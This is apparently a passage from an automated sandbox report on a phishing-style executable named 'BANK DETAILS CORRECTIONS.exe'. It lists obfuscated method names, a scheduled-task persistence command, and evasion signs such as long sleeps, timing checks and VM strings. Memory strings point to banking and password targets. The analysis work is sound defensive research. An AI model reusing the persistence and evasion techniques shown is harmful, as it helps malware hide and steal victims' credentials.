                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, GUMbEE00TLA92cGkmO.csHigh entropy of concatenated method names: 'mbl8top0Cw', 'gaB8TQESAl', 'T6N8Qvi0rX', 'r4T8jqlmEV', 'CP78qSC7kM', 'qBA8PmrOiQ', 'ile8gCpbAB', 'cbM802eaVH', 'kAL8cOY0ja', 'IjJ8fLeGDx'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, zlkrqTUSCeJO6SjsTBn.csHigh entropy of concatenated method names: 'sXGMyQM1nd', 'ClqMGtMjA2', 'b95MuetAx3', 'PyJMIUuqSi', 'mwOMbcbDFG', 'awnM26Zfrs', 'To8MYWa83J', 'AuTMaZSmZg', 'uBmMwtSUSB', 'N9HMRFgaB5'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, OectpLryIkurccAY12.csHigh entropy of concatenated method names: 'cQTUge1LJP', 'Jf5U0VFXiQ', 'MKpUfce67Z', 'EFXUVgPBSj', 'GcTUNSO9DG', 'OpIUOwqTm6', 'vjxVdY2JUkSAmoCshy', 'McOGQ73DKphXvybRTN', 'I28UUn4qqB', 'j4rU8293Ih'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.41b5f80.2.raw.unpack, k2HUP0FNHjHWySwOx9.csHigh entropy of concatenated method names: 'SnkN98wOjd', 'TYHNossVpf', 'G1FNFnbYXq', 'hGsNH4s6Vm', 'cNrN7rHAdY', 'MCRN6NvH9s', 'JhcNWfYYfA', 'AyyND7lQJ4', 'bQCNpYZSdm', 'NpgNmq7ypl'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                Source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe File created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe

                Boot Survival

                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: fcLfLlfpmjf.exe PID: 7212, type: MEMORYSTR
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 1350000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 2DB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 4DB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 7FE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 8FE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: 92A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Memory allocated: A2A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 2680000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 2880000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 26D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 73C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 83C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 8660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Memory allocated: 9660000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E rdtsc 12_2_0196096E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1221
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2743
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Window / User API: threadDelayed 1788
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Window / User API: threadDelayed 8184
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe API coverage: 1.4 %
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe API coverage: 0.3 %
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe TID: 7640 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep count: 1221 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5760 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe TID: 5668 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep count: 1788 > 30
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep time: -3576000s >= -30000s
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep count: 8184 > 30
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7788 Thread sleep time: -16368000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep count: 36 > 30
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -54000s >= -30000s
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe TID: 7920 Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Thread delayed: delay time: 922337203685477
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: DC886F4.21.dr Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: DC886F4.21.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: DC886F4.21.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: DC886F4.21.dr Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: DC886F4.21.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: DC886F4.21.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: DC886F4.21.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
